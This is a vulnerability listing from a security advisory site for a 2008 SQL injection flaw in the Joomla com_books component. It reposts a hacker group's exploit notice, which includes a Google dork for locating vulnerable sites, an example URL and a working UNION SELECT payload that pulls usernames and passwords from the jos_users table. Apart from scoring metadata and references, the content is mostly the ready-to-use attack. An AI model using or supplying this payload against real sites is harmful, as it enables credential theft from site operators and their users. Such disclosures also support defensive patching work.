Joomla com_books(book_id) SQL injection Vulnerability

2008.12.19
Credit: boom3rang
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################### Joomla com_books(book_id) SQL injection Vulnerability ####################################################### ################################################### #[~] Author : boom3rang #[~] Kosova Hackers Group [www.khg-crew.ws] #[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. #[!] Module_Name: com_books #[!] Script_Name: Joomla #[!] Google_Dork: inurl:"com_books" ################################################## #[~] Example: http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit] #[~]Exploit: -9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users-- ############################## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ##############################

References:

http://xforce.iss.net/xforce/xfdb/46561
http://www.securityfocus.com/bid/32255
http://www.milw0rm.com/exploits/7092


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top